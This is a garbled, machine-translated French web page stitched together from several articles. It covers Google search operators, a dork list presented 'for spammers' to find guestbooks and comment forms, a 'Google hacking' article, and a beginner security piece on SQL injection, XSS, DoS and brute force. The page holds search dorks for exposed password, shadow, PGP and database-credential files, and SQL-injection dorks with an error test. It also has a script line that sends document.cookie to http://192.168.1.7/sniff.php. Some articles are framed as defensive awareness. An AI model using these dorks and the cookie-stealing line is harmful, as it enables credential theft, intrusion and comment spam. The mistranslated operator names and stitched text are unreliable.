LA CLOCHE

Il y a ceux qui ont lu cette nouvelle avant vous.
Abonnez-vous pour recevoir les derniers articles.
Email
Nom
Nom de famille
Comment voulez-vous lire The Bell
Pas de spam

Comment rechercher correctement avec google.com

Tout le monde sait probablement comment utiliser un moteur de recherche comme Google \u003d) Mais tout le monde ne sait pas que si vous composez correctement une requête de recherche en utilisant des constructions spéciales, vous pouvez obtenir les résultats que vous recherchez beaucoup plus efficacement et plus rapidement \u003d) Dans cet article, je vais essayer de montrer que et comment procéder pour rechercher correctement

Google prend en charge plusieurs opérateurs de recherche avancés qui ont une signification particulière lors de la recherche sur google.com. En règle générale, ces opérateurs modifient la recherche, voire demandent à Google d'effectuer des types de recherche complètement différents. Par exemple, la construction lien: est un opérateur spécial, et la demande lien: www.google.com ne vous donnera pas une recherche normale, mais trouvera à la place toutes les pages Web contenant des liens vers google.com.
types de demande alternatifs

cache: Si vous incluez d'autres mots dans votre requête, Google mettra en évidence ces mots inclus dans le document mis en cache.
Par exemple, cache: site www.web affichera le contenu mis en cache avec le mot «web» en surbrillance.

lien: la requête de recherche décrite ci-dessus affichera les pages Web contenant des liens vers la requête spécifiée.
Par exemple: lien: www.site affichera toutes les pages qui ont un lien vers http: //www.site

en relation: Affiche les pages Web "liées" à la page Web spécifiée.
Par exemple, en rapport: www.google.com répertorie les pages Web similaires à la page d'accueil de Google.

info: Demande d'informations: fournit certaines des informations dont dispose Google sur la page Web demandée.
Par exemple, info: site web affichera des informations sur notre forum \u003d) (Armada - Forum des webmasters adultes).

Autres demandes d'informations

définir: Le define: query fournira une définition des mots que vous entrez après cela, compilée à partir de diverses sources en ligne. La définition s'appliquera à toute la phrase saisie (c'est-à-dire qu'elle inclura tous les mots de la requête exacte).

stocks: Si vous commencez votre demande avec des actions: Google traitera le reste des conditions de la demande comme des symboles boursiers et un lien vers une page affichant les informations prêtes pour ces symboles.
Par exemple, actions: Intel yahoo affichera des informations sur Intel et Yahoo. (Notez que vous devez taper les derniers symboles d'actualités, pas le nom de l'entreprise)

Demander des modificateurs

site: Si vous incluez site: dans votre requête, Google limitera les résultats aux sites Web qu'il trouve sur le domaine donné.
Vous pouvez également rechercher des zones individuelles, telles que ru, org, com, etc. ( site: com site: ru)

allintitle: Si vous exécutez une requête avec allintitle :, Google limitera les résultats avec tous les mots de la requête dans l'en-tête.
Par exemple, allintitle: recherche google renverra toutes les pages de recherche Google comme les images, le blog, etc.

intituler: Si vous incluez intitle: dans votre demande, Google limitera les résultats aux documents contenant ce mot dans le titre.
Par exemple, intitulé: Entreprise

allinurl: Si vous exécutez une requête avec allinurl: Google limitera les résultats, avec tous les mots de requête dans l'URL.
Par exemple, allinurl: recherche google retournera des documents avec google et recherchera dans l'en-tête. De plus, en option, vous pouvez séparer les mots par une barre oblique (/), puis les mots des deux côtés de la barre oblique seront recherchés dans la même page: Exemple allinurl: toto / bar

inurl: Si vous incluez inurl: dans votre requête, Google limitera les résultats aux documents contenant ce mot dans l'URL.
Par exemple, Animation inurl: site web

intext: recherche uniquement dans le texte de la page le mot spécifié, en ignorant le titre et les textes du lien, et d'autres choses sans rapport avec. Il existe également un dérivé de ce modificateur - allintext: ceux. en outre, tous les mots de la requête seront recherchés uniquement dans le texte, ce qui est également important, en ignorant les mots fréquemment utilisés dans les liens
Par exemple, intext: forum

daterange: recherches dans les délais (plage de dates: 2452389-2452389), les dates des heures sont spécifiées au format julien.

Eh bien, et toutes sortes d'exemples intéressants de demandes

Exemples d'écriture de requêtes pour Google. Pour les spammeurs

Inurl: control.guest? A \u003d signe

Site: books.dreambook.com "URL de la page d'accueil" "Signer mon" inurl: sign

Site: www.freegb.net Page d'accueil

Inurl: sign.asp "Nombre de caractères"

"Message:" inurl: sign.cfm "Expéditeur:"

Inurl: register.php «Enregistrement de l'utilisateur» «Site Web»

Inurl: edu / livre d'or "Signer le livre d'or"

Inurl: publier "Publier un commentaire" "URL"

Inurl: / archives / "Commentaires:" "Vous vous souvenez des informations?"

"Script et livre d'or créés par:" "URL:" "Commentaires:"

Inurl :? Action \u003d ajouter "phpBook" "URL"

Intitle: "Soumettre une nouvelle histoire"

Les magazines

Inurl: www.livejournal.com/users/ mode \u003d réponse

Inurl greatjournal.com/ mode \u003d réponse

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "Livre d'or"

Blogs

Inurl: blogger.com/comment.g? "PostID" "anonyme"

Inurl: typepad.com/ "Publier un commentaire" "Vous vous souvenez de vos informations personnelles?"

Inurl: greatjournal.com/community/ "Publier un commentaire" "adresses des affiches anonymes"

"Publier un commentaire" "adresses des affiches anonymes" -

Intitle: "Publier un commentaire"

Inurl: pirillo.com «Publier un commentaire»

Forums

Inurl: gate.html? "Nom \u003d Forums" "mode \u003d réponse"

Inurl: "forum / publication.php? Mode \u003d réponse"

Inurl: "mes.php?"

Inurl: "membres.html"

Inurl: forum / memberlist.php? »

Piratage avec Google

Alexandre Antipov

Le moteur de recherche Google (www.google.com) propose de nombreuses options de recherche. Toutes ces capacités sont un outil de recherche inestimable pour un nouvel utilisateur d'Internet et en même temps une arme d'invasion et de destruction encore plus puissante entre les mains de personnes aux intentions malveillantes, y compris non seulement des pirates informatiques, mais aussi des criminels non informatiques et même des terroristes.
(9475 vues en 1 semaine)


Denis Batrankov
denisNOSPAMixi.ru

Attention:Cet article n'est pas un guide d'action. Cet article a été écrit pour vous, administrateurs de serveurs WEB, afin que vous perdiez le faux sentiment d'être en sécurité, et que vous compreniez enfin le caractère insidieux de cette méthode pour obtenir des informations et prendre la protection de votre site.

introduction

Par exemple, j'ai trouvé 1670 pages en 0,14 seconde!

2. Introduisons une autre ligne, par exemple:

inurl: "auth_user_file.txt"

un peu moins, mais c'est déjà suffisant pour le téléchargement gratuit et pour les attaques par force brute (en utilisant le même John The Ripper). Ci-dessous, je donnerai quelques exemples supplémentaires.

Vous devez donc vous rendre compte que le moteur de recherche Google a visité la plupart des sites Internet et mis en cache les informations qu'ils contiennent. Ces informations mises en cache vous permettent d'obtenir des informations sur le site et le contenu du site sans connexion directe au site, en explorant simplement les informations stockées dans Google. De plus, si les informations sur le site ne sont plus disponibles, les informations contenues dans le cache peuvent encore être conservées. Tout ce qu'il faut pour cette méthode est de connaître certains mots-clés Google. Cette technique s'appelle Google Hacking.

Pour la première fois, des informations sur Google Hacking sont apparues sur la liste de diffusion Bugtruck il y a 3 ans. En 2001, ce sujet a été évoqué par un étudiant français. Voici un lien vers cette lettre http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Il fournit les premiers exemples de telles requêtes:

1) Index de / admin
2) Index de / mot de passe
3) Index de / mail
4) Index des / + banques + type de fichier: xls (pour la france ...)
5) Index de / + passwd
6) Index de / password.txt

Ce sujet a récemment fait sensation dans la partie anglophone d'Internet: après l'article de Johnny Long publié le 7 mai 2004. Pour une étude plus complète de Google Hacking, je vous suggère de visiter le site de cet auteur à http://johnny.ihackstuff.com. Dans cet article, je veux juste vous mettre à jour.

Qui peut l'utiliser:
- Les journalistes, les espions et toutes les personnes qui aiment se pencher sur d'autres sujets peuvent utiliser cela pour rechercher des preuves compromettantes.
- Les pirates recherchent des cibles appropriées pour le piratage.

Comment fonctionne Google.

Pour poursuivre la conversation, permettez-moi de vous rappeler certains des mots clés utilisés dans les requêtes Google.

Rechercher à l'aide du signe +

Google exclut les mots sans importance pour Google. Par exemple, interrogez des mots, des prépositions et des articles en anglais: par exemple are, of, where. En russe, Google semble considérer tous les mots comme importants. Si le mot est exclu de la recherche, Google écrit à son sujet. Pour que Google commence à rechercher des pages avec ces mots devant eux, vous devez ajouter un signe + sans espace avant le mot. Par exemple:

as + de base

Rechercher à l'aide d'un signe -

Si Google trouve un grand nombre de pages dont il est nécessaire d'exclure des pages avec un sujet spécifique, vous pouvez forcer Google à rechercher uniquement les pages qui ne contiennent pas de mots spécifiques. Pour ce faire, vous devez indiquer ces mots, en les mettant avant chaque signe - sans espace avant le mot. Par exemple:

vodka de pêche

Rechercher avec ~

Vous souhaiterez peut-être rechercher non seulement le mot spécifié, mais également ses synonymes. Pour ce faire, faites précéder le mot du symbole ~.

Trouver la phrase exacte à l'aide de guillemets doubles

Google recherche sur chaque page toutes les occurrences des mots que vous avez écrits dans la chaîne de requête, et il ne se soucie pas de la position relative des mots, l'essentiel est que tous les mots spécifiés soient sur la page en même temps (c'est l'action par défaut). Pour trouver la phrase exacte, vous devez la mettre entre guillemets. Par exemple:

"serre-livre"

Pour avoir au moins un des mots spécifiés, vous devez spécifier explicitement l'opération logique: OU. Par exemple:

livre sécurité OU protection

De plus, dans la barre de recherche, vous pouvez utiliser le signe * pour désigner n'importe quel mot et. pour désigner n'importe quel caractère.

Recherche de mots à l'aide d'opérateurs supplémentaires

Il existe des opérateurs de recherche spécifiés dans la chaîne de recherche au format:

opérateur: search_term

Les espaces à côté des deux points ne sont pas nécessaires. Si vous insérez un espace après les deux points, vous verrez un message d'erreur, et avant lui, Google les utilisera comme chaîne de recherche normale.
Il existe des groupes d'opérateurs de recherche supplémentaires: langues - indiquez dans quelle langue vous voulez voir le résultat, date - résultats limités pour les trois, six ou 12 derniers mois, occurrences - indiquez où dans le document vous devez rechercher une chaîne: partout, dans le titre, dans l'URL, domaines - rechercher le site spécifié ou, au contraire, l'exclure de la recherche, rechercher en toute sécurité - bloquer les sites contenant le type d'informations spécifié et les supprimer des pages de résultats de recherche.
Cependant, certains opérateurs n'ont pas besoin d'un paramètre supplémentaire, par exemple, la requête " cache: www.google.com"peut être appelé comme une chaîne de recherche à part entière, et certains mots clés, au contraire, nécessitent un mot de recherche, par exemple" site: www.google.com aide". À la lumière de notre sujet, examinons les opérateurs suivants:

Opérateur

La description

Nécessite un paramètre supplémentaire?

rechercher uniquement sur le site spécifié dans search_term

rechercher uniquement dans les documents de type search_term

trouver les pages contenant search_term dans le titre

trouver des pages contenant tous les mots search_term dans le titre

trouver les pages contenant le mot search_term dans leur URL

trouver des pages contenant tous les mots search_term dans leur url

Opérateur site: limite la recherche uniquement au site spécifié, et vous pouvez spécifier non seulement le nom de domaine, mais également l'adresse IP. Par exemple, entrez:

Opérateur type de fichier: restreint les recherches aux fichiers d'un type spécifique. Par exemple:

À la date de sortie de l'article, Google peut effectuer une recherche dans 13 formats de fichiers différents:

  • Format de document portable Adobe (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Écriture Microsoft (wri)
  • Format de texte enrichi (rtf)
  • Shockwave Flash (swf)
  • Texte (ans, txt)

Opérateur lien: affiche toutes les pages qui pointent vers la page spécifiée.
Il est probablement toujours intéressant de voir combien d'endroits sur Internet vous connaissent. En essayant:

Opérateur cache: montre la version du site dans le cache de Google, telle qu'elle était la dernière fois que Google a visité cette page. Nous prenons tout site qui change fréquemment et regardons:

Opérateur intituler: recherche le mot spécifié dans le titre de la page. Opérateur allintitle: est une extension - il recherche tous les mots multiples spécifiés dans le titre de la page. Comparer:

intitle: vol vers mars
intitle: flight intitle: to intitle: mars
allintitle: vol vers mars

Opérateur inurl:fait que Google affiche toutes les pages contenant la chaîne spécifiée dans l'URL. Operator allinurl: Recherche tous les mots d'une URL. Par exemple:

allinurl: acid_stat_alerts.php

Cette commande est particulièrement utile pour ceux qui n'ont pas SNORT - au moins ils peuvent voir comment cela fonctionne sur un système réel.

Méthodes de piratage avec Google

Nous avons donc découvert qu'en utilisant une combinaison des opérateurs et des mots-clés ci-dessus, tout le monde peut commencer à collecter les informations nécessaires et à rechercher des vulnérabilités. Ces techniques sont souvent appelées Google Hacking.

plan du site

Vous pouvez utiliser le site: opérateur pour visualiser tous les liens que Google trouve sur le site. Habituellement, les pages créées dynamiquement par des scripts ne sont pas indexées à l'aide de paramètres, de sorte que certains sites utilisent des filtres ISAPI afin que les liens ne soient pas au format /article.asp?num\u003d10&dst\u003d5, et avec des barres obliques / article / abc / num / 10 / dst / 5... Ceci est fait pour que le site soit généralement indexé par les moteurs de recherche.

Essayons:

site: www.whitehouse.gov maison blanche

Google pense que chaque page du site contient le mot whitehouse. C'est ce que nous utilisons pour obtenir toutes les pages.
Il existe également une version simplifiée:

site: whitehouse.gov

Et la meilleure partie est que les camarades de whitehouse.gov ne savaient même pas que nous avions examiné la structure de leur site et même regardé dans les pages en cache que Google téléchargeait pour lui-même. Cela peut être utilisé pour étudier la structure des sites et visualiser le contenu, en restant inaperçu pour le moment.

Affichage d'une liste de fichiers dans les répertoires

Les serveurs WEB peuvent afficher des listes de répertoires de serveurs au lieu de pages HTML classiques. Ceci est généralement fait pour amener les utilisateurs à sélectionner et télécharger des fichiers spécifiques. Cependant, dans de nombreux cas, les administrateurs n'ont pas pour objectif d'afficher le contenu d'un répertoire. Cela se produit en raison d'une mauvaise configuration du serveur ou de l'absence de la page principale dans le répertoire. En conséquence, le pirate a une chance de trouver quelque chose d'intéressant dans l'annuaire et de l'utiliser à ses propres fins. Pour trouver toutes ces pages, notez simplement qu'elles contiennent toutes les mots: index de dans leur titre. Mais comme les mots index de ne contiennent pas que de telles pages, nous devons clarifier la requête et prendre en compte les mots-clés sur la page elle-même, donc les requêtes du formulaire nous conviendront:

intitle: index.du répertoire parent
intitle: index.of nom taille

Étant donné que la plupart des listes de répertoires sont intentionnelles, vous pouvez trouver difficile de trouver des listes erronées la première fois. Mais au moins, vous pouvez déjà utiliser les listes pour déterminer la version du serveur WEB, comme décrit ci-dessous.

Obtenir la version du serveur WEB.

Connaître la version du serveur WEB est toujours utile avant de lancer une attaque de hacker. Encore une fois, grâce à Google, vous pouvez obtenir ces informations sans vous connecter à un serveur. Si vous regardez attentivement la liste du répertoire, vous pouvez voir que le nom du serveur WEB et sa version y sont affichés.

Apache1.3.29 - Serveur ProXad sur trf296.free.fr Port 80

Un administrateur expérimenté peut modifier ces informations, mais, en règle générale, c'est vrai. Ainsi, pour obtenir ces informations, il suffit d'envoyer une requête:

intitle: index.of server.at

Pour obtenir des informations pour un serveur spécifique, nous clarifions la demande:

intitle: index.of server.at site: ibm.com

Ou vice versa, nous recherchons des serveurs fonctionnant sur une version de serveur spécifique:

intitle: index.of Apache / 2.0.40 Server sur

Cette technique peut être utilisée par un hacker pour trouver une victime. Si, par exemple, il a un exploit pour une certaine version du serveur WEB, alors il peut le trouver et essayer l'exploit existant.

Vous pouvez également obtenir la version du serveur en consultant les pages qui sont installées par défaut lors de l'installation d'une nouvelle version du serveur WEB. Par exemple, pour voir la page de test Apache 1.2.6, tapez simplement

intitle: Test.Page.for.Apache it.worked!

De plus, certains systèmes d'exploitation installent et exécutent immédiatement le serveur WEB lors de l'installation. Cependant, certains utilisateurs ne sont même pas conscients de cela. Naturellement, si vous voyez que quelqu'un n'a pas supprimé la page par défaut, alors il est logique de supposer que l'ordinateur n'a été soumis à aucune configuration et est probablement vulnérable aux attaques.

Essayez de trouver les pages IIS 5.0

allintitle: Bienvenue dans les services Internet Windows 2000

Dans le cas d'IIS, vous pouvez déterminer non seulement la version du serveur, mais également la version Windows et le Service Pack.

Une autre façon de déterminer la version du serveur WEB est de rechercher des manuels (pages de conseils) et des exemples qui peuvent être installés sur le site par défaut. Les pirates informatiques ont trouvé de nombreuses façons d'utiliser ces composants pour obtenir un accès privilégié à un site. C'est pourquoi vous devez supprimer ces composants sur le site de production. Sans parler du fait que par la présence de ces composants, vous pouvez obtenir des informations sur le type de serveur et sa version. Par exemple, recherchez le manuel Apache:

inurl: modules manuels de directives apache

Utilisation de Google comme scanner CGI.

Le scanner CGI ou WEB scanner est un utilitaire pour trouver des scripts et des programmes vulnérables sur le serveur de la victime. Ces utilitaires doivent savoir quoi rechercher, pour cela, ils ont toute une liste de fichiers vulnérables, par exemple:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Nous pouvons trouver chacun de ces fichiers à l'aide de Google, en utilisant les mots index of ou inurl en plus du nom de fichier dans la barre de recherche: nous pouvons trouver des sites avec des scripts vulnérables, par exemple:

allinurl: /random_banner/index.cgi

En utilisant les connaissances supplémentaires, un pirate informatique peut exploiter une vulnérabilité de script et utiliser cette vulnérabilité pour forcer le script à renvoyer tout fichier stocké sur le serveur. Par exemple, un fichier de mot de passe.

Comment se protéger du piratage de Google.

1. Ne publiez pas de données importantes sur le serveur WEB.

Même si vous avez publié les données temporairement, vous pouvez les oublier, ou quelqu'un aura le temps de trouver et de récupérer ces données avant de les effacer. Ne fais pas ça. Il existe de nombreuses autres façons de transférer des données pour les protéger du vol.

2. Vérifiez votre site.

Utilisez les méthodes décrites pour rechercher votre site. Vérifiez régulièrement votre site avec les nouvelles méthodes qui apparaissent à http://johnny.ihackstuff.com. N'oubliez pas que si vous souhaitez automatiser vos actions, vous devez obtenir une autorisation spéciale de Google. Si vous lisez attentivement http://www.google.com/terms_of_service.html alors vous verrez la phrase: Vous ne pouvez pas envoyer de requêtes automatiques de quelque sorte que ce soit au système de Google sans l'autorisation expresse préalable de Google.

3. Vous n'avez peut-être pas besoin de Google pour indexer votre site ou une partie de celui-ci.

Google vous permet de supprimer un lien vers votre site ou une partie de celui-ci de sa base de données, ainsi que de supprimer des pages du cache. De plus, vous pouvez interdire la recherche d'images sur votre site, interdire l'affichage de courts fragments de pages dans les résultats de recherche. Toutes les options de suppression d'un site sont décrites sur la page http://www.google.com/remove.html ... Pour ce faire, vous devez confirmer que vous êtes réellement le propriétaire de ce site ou insérer des balises dans la page ou

4. Utilisez le fichier robots.txt

On sait que les moteurs de recherche regardent dans le fichier robots.txt situé à la racine du site et n'indexent pas les parties marquées du mot Refuser... Vous pouvez en profiter pour éviter qu'une partie du site ne soit indexée. Par exemple, pour éviter d'indexer tout le site, créez un fichier robots.txt contenant deux lignes:

Agent utilisateur: *
Interdire: /

Que se passe-t-il d'autre

Pour que la vie ne vous semble pas comme du miel, je dirai à la fin qu'il existe des sites qui suivent ces personnes qui, en utilisant les méthodes ci-dessus, recherchent des trous dans les scripts et les serveurs WEB. Un exemple d'une telle page est

Application.

Un peu sucré. Essayez vous-même quelque chose de la liste suivante:

1. #mysql dump filetype: sql - recherche des vidages de bases de données mySQL
2. Rapport récapitulatif des vulnérabilités de l'hôte - vous montrera les vulnérabilités trouvées par d'autres personnes
3.phpMyAdmin s'exécutant sur inurl: main.php - cela forcera le contrôle de fermeture via le panneau phpmyadmin
4. pas pour une distribution confidentielle
5. Détails de la requête Variables du serveur de l'arborescence de contrôle
6. Exécution en mode enfant
7. Ce rapport a été généré par WebLog
8.intitle: index.of cgiirc.config
9.filetype: conf inurl: firewall -intitle: cvs - quelqu'un peut-il avoir besoin des fichiers de configuration du pare-feu? :)
10. intitule: index.of finances.xls - hmm ....
11.intitle: Index des discussions dbconvert.exe - Journaux de discussion ICQ
12.intext: Analyse du trafic Tobias Oetiker
13.intitle: Statistiques d'utilisation générées par Webalizer
14.intitle: statistiques des statistiques Web avancées
15.intitule: index.of ws_ftp.ini - ws ftp config
16.inurl: ipsec.secrets détient des secrets partagés - la clé secrète est une bonne trouvaille
17.inurl: main.php Bienvenue dans phpMyAdmin
18.inurl: informations sur le serveur Informations sur le serveur Apache
19.site: notes d'administrateur d'edu
20. ORA-00921: fin inattendue de la commande SQL - obtention des chemins
21. intitulé: index.of trillian.ini
22. intitle: Index de pwd.db
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25. inurl: passlist.txt
26. intitle: Index de .mysql_history
27. intitle: index de intext: globals.inc
28. intitle: index.of administrators.pwd
29. intitle: Index.of etc shadow
30. intitle: index.of secring.pgp
31.inurl: config.php dbuname dbpass
32. inurl: exécute filetype: ini

  • "Piratage avec Google"
  • Centre de formation "Informzashita" http://www.itsecurity.ru - un centre spécialisé de premier plan dans le domaine de la formation à la sécurité de l'information (licence du Comité de l'éducation de Moscou n ° 015470, accréditation d'État n ° 004251). Le seul centre de formation agréé pour les systèmes de sécurité Internet et Clearswift en Russie et dans les pays de la CEI. Centre de formation agréé Microsoft (spécialisation Sécurité). Les programmes de formation sont coordonnés avec la Commission technique d'État de Russie, le FSB (FAPSI). Certificats de formation et documents d'État sur le développement professionnel.

    SoftKey est un service unique pour les acheteurs, les développeurs, les concessionnaires et les partenaires affiliés. En outre, il s'agit de l'un des meilleurs magasins de logiciels en ligne en Russie, en Ukraine et au Kazakhstan, qui offre aux clients un large assortiment, de nombreuses méthodes de paiement, un traitement rapide (souvent instantané) des commandes, le suivi du processus d'exécution des commandes dans la section personnelle, diverses remises du magasin et des fabricants PAR.

    J'ai décidé de parler un peu de la sécurité de l'information. Cet article sera utile pour les programmeurs novices et ceux qui viennent de commencer à développer Frontend. Quel est le problème?

    De nombreux développeurs novices sont tellement accro à l'écriture de code qu'ils oublient complètement la sécurité de leur travail. Et surtout, ils oublient les vulnérabilités telles que les requêtes SQL, XXS. Ils proposent également des mots de passe légers pour leurs panneaux d'administration et sont soumis à la force brute. Quelles sont ces attaques et comment les éviter?

    Injection SQL

    L'injection SQL est le type d'attaque de base de données le plus courant qui est effectué avec une requête SQL pour un SGBD spécifique. De nombreuses personnes et même de grandes entreprises souffrent de telles attaques. La raison est l'erreur d'un développeur lors de l'écriture d'une base de données et, en fait, des requêtes SQL.

    Une attaque par injection SQL est possible en raison d'un traitement incorrect des données d'entrée utilisées dans les requêtes SQL. Si un hacker réussit une attaque, vous risquez de perdre non seulement le contenu des bases de données, mais, par conséquent, les mots de passe et les journaux du panneau d'administration. Et ces données suffiront amplement à reprendre complètement le contrôle du site ou à y apporter des ajustements irréversibles.

    L'attaque peut être répliquée avec succès dans des scripts écrits en PHP, ASP, Perl et d'autres langages. Le succès de ces attaques dépend davantage du SGBD utilisé et de la manière dont le script lui-même est implémenté. Il existe de nombreux sites d'injection SQL vulnérables dans le monde. Ceci est facile à vérifier. Il suffit de saisir "dorks" - ce sont des demandes spéciales pour trouver des sites vulnérables. En voici quelques uns:

    • inurl: index.php? id \u003d
    • inurl: trainers.php? id \u003d
    • inurl: buy.php? category \u003d
    • inurl: article.php? ID \u003d
    • inurl: play_old.php? id \u003d
    • inurl: declaration_more.php? decl_id \u003d
    • inurl: pageid \u003d
    • inurl: games.php? id \u003d
    • inurl: page.php? fichier \u003d
    • inurl: newsDetail.php? id \u003d
    • inurl: gallery.php? id \u003d
    • inurl: article.php? id \u003d

    Comment les utiliser? Il suffit de les saisir dans un moteur de recherche Google ou Yandex. Le moteur de recherche vous donnera non seulement un site vulnérable, mais également une page pour cette vulnérabilité. Mais nous ne nous attarderons pas là-dessus et nous nous assurerons que la page est effectivement vulnérable. Pour ce faire, il suffit de mettre un guillemet simple "" "après la valeur" id \u003d 1 ". Quelque chose comme ça:

    • inurl: games.php? id \u003d 1 '

    Et le site nous donnera une erreur sur la requête SQL. De quoi notre hacker a-t-il besoin ensuite?

    Et puis il a besoin de ce lien vers la page d'erreur. Ensuite, le travail sur la vulnérabilité se déroule dans la plupart des cas dans la distribution "Kali linux" avec ses utilitaires pour cette partie: injection du code d'injection et réalisation des opérations nécessaires. Comment cela va-t-il arriver, je ne peux pas vous le dire. Mais vous pouvez trouver des informations à ce sujet sur Internet.

    Attaque XSS

    Ce type d'attaque est réalisé sur les cookies. Les utilisateurs, quant à eux, aiment beaucoup les enregistrer. Pourquoi pas? Comment sans eux? En effet, grâce aux Cookies, nous ne conduisons pas un mot de passe de Vk.com ou Mail.ru cent fois. Et peu de ceux qui les refusent. Mais sur Internet pour les hackers, il y a souvent une règle: le facteur de commodité est directement proportionnel au facteur d'insécurité.

    Pour mettre en œuvre une attaque XSS, notre hacker a besoin de connaissances en JavaScript. À première vue, le langage est très simple et inoffensif, car il n'a pas accès aux ressources informatiques. Un hacker ne peut travailler avec JavaScript que dans un navigateur, mais cela suffit. Après tout, l'essentiel est de saisir le code dans la page Web.

    Je n'entrerai pas dans les détails du processus d'attaque. Je vais juste vous dire les bases et la signification de la façon dont cela se produit.

    Un hacker peut ajouter du code JS à un forum ou un livre d'or:

    Les scripts nous redirigeront vers la page infectée, où le code sera exécuté: que ce soit un renifleur, une sorte de stockage ou un exploit qui volera d'une manière ou d'une autre nos cookies du cache.

    Pourquoi JavaScript? Parce que JavaScript s'entend bien avec les requêtes Web et a accès aux cookies. Mais si notre script nous transfère vers un site, l'utilisateur le remarquera facilement. Ici, le hacker utilise une option plus rusée - il écrit simplement le code dans l'image.

    Img \u003d nouvelle image ();

    Img.src \u003d ”http://192.168.1.7/sniff.php?32+document.cookie;

    Nous créons simplement une image et attribuons notre script comme adresse.

    Comment se protéger de tout ça? Très simple - ne cliquez pas sur les liens suspects.

    Attaques DoS et DDos


    DoS (de l'anglais Denial of Service - déni de service) - une attaque de pirate informatique sur un système informatique afin de le mettre en panne. Il s'agit de la création de telles conditions dans lesquelles les utilisateurs consciencieux du système ne peuvent pas accéder aux ressources système fournies (serveurs), ou cet accès est difficile. La défaillance du système peut être un pas vers sa capture, si dans une situation d'urgence le logiciel donne des informations critiques: par exemple, la version, une partie du code du programme, etc. Mais le plus souvent c'est une mesure de pression économique: la perte d'un service simple qui génère des revenus. Les factures du fournisseur ou les mesures pour éviter une attaque touchent de manière significative la «cible» dans la poche. Actuellement, les attaques DoS et DDoS sont les plus populaires, car elles permettent à presque tous les systèmes de tomber en panne sans laisser de preuves juridiques.

    Quelle est la différence entre les attaques DoS et DDos?

    DoS est une attaque intelligemment construite. Par exemple, si le serveur ne vérifie pas l'exactitude des paquets entrants, alors un pirate peut faire une telle demande, qui sera traitée pour toujours, et il n'y aura pas assez de temps processeur pour travailler avec d'autres connexions. En conséquence, les clients recevront un déni de service. Mais cela ne fonctionnera pas pour surcharger ou désactiver de grands sites bien connus de cette manière. Ils sont armés de canaux assez larges et de serveurs super puissants qui peuvent facilement faire face à une telle surcharge.

    DDoS est en fait la même attaque que DoS. Mais s'il y a un paquet de requête dans DoS, alors dans DDoS, il peut y en avoir des centaines ou plus. Même les serveurs très puissants pourraient ne pas être en mesure de gérer cette surcharge. Laisse moi te donner un exemple.

    L'attaque DoS se produit lorsque vous avez une conversation avec quelqu'un, mais qu'une personne mal élevée arrive et commence à crier fort. En même temps, il est soit impossible, soit très difficile de parler. Solution: appelez la sécurité, qui se calmera et conduira la personne hors de la pièce. Les attaques DDoS se produisent lorsque des personnes aussi mal élevées sont précipitées par une foule de milliers de personnes. Dans ce cas, les gardes ne pourront pas se tordre et emmener tout le monde.

    DoS et DDoS sont produits à partir d'ordinateurs appelés zombies. Ce sont des ordinateurs d'utilisateurs piratés par des pirates informatiques qui ne soupçonnent même pas que leur machine est impliquée dans une attaque sur un serveur.

    Comment s'en protéger? En général, rien. Mais il est possible de compliquer la tâche d'un hacker. Pour ce faire, vous devez choisir un bon hébergement avec des serveurs puissants.

    Attaque de force brute

    Un développeur peut proposer de nombreux systèmes de protection contre les attaques, visualiser intégralement les scripts que nous avons écrits, rechercher des vulnérabilités sur le site, etc. Mais quand il s'agit de la dernière étape de la mise en page du site, à savoir quand il va simplement mettre le mot de passe sur le panneau d'administration, il peut oublier une chose. Mot de passe!

    Il est fortement déconseillé de définir un mot de passe simple. Il peut s'agir de 12345, 1114457, vasya111, etc. Il n'est pas recommandé de définir des mots de passe de moins de 10 à 11 caractères. Sinon, vous risquez de subir l'attaque la plus courante et la plus simple: la force brute.

    Brute Force est une attaque par mot de passe basée sur un dictionnaire utilisant des programmes spéciaux. Les dictionnaires peuvent être différents: latin, énumération par nombres, par exemple jusqu'à une certaine plage, mixte (latin + nombres), et même il existe des dictionnaires avec des symboles uniques @ # 4 $% & * ~~ `'” \\? etc.

    Bien entendu, ce type d'attaque peut être facilement évité en créant un mot de passe complexe. Même le captcha peut vous sauver. Et aussi, si votre site est réalisé sur un CMS, alors beaucoup d'entre eux calculent ce type d'attaque et bloquent l'IP. Vous devez toujours vous rappeler que plus il y a de caractères différents dans le mot de passe, plus il est difficile de le trouver.

    Comment fonctionnent les hackers? Dans la plupart des cas, ils soupçonnent ou connaissent au préalable une partie du mot de passe. Il est tout à fait logique de supposer que le mot de passe de l'utilisateur ne sera certainement pas composé de 3 ou 5 caractères. Ces mots de passe conduisent à des piratages fréquents. Fondamentalement, les pirates prennent une plage de 5 à 10 caractères et y ajoutent quelques caractères, qu'ils connaissent probablement à l'avance. Ensuite, les mots de passe avec les plages requises sont générés. La distribution Kali Linux contient même des programmes pour de tels cas. Et voila, l'attaque ne durera plus longtemps, puisque le volume du dictionnaire n'est plus si grand. De plus, un pirate informatique peut utiliser la puissance de la carte vidéo. Certains d'entre eux prennent en charge le système CUDA, tandis que la vitesse de recherche augmente jusqu'à 10 fois. Et maintenant, nous voyons qu'une attaque d'une manière aussi simple est bien réelle. Mais non seulement les sites Web sont soumis à la force brute.

    Chers développeurs, n'oubliez jamais le système de sécurité de l'information, car aujourd'hui de nombreuses personnes, y compris les États, souffrent de ce type d'attaques. Après tout, la plus grande vulnérabilité est une personne qui peut toujours être distraite quelque part ou quelque part à ne pas négliger. Nous sommes des programmeurs, mais pas des machines programmées. Soyez toujours à l'affût, car la perte d'informations menace de graves conséquences!

    LA CLOCHE

    Il y a ceux qui ont lu cette nouvelle avant vous.
    Abonnez-vous pour recevoir les derniers articles.
    Email
    Nom
    Nom de famille
    Comment voulez-vous lire The Bell
    Pas de spam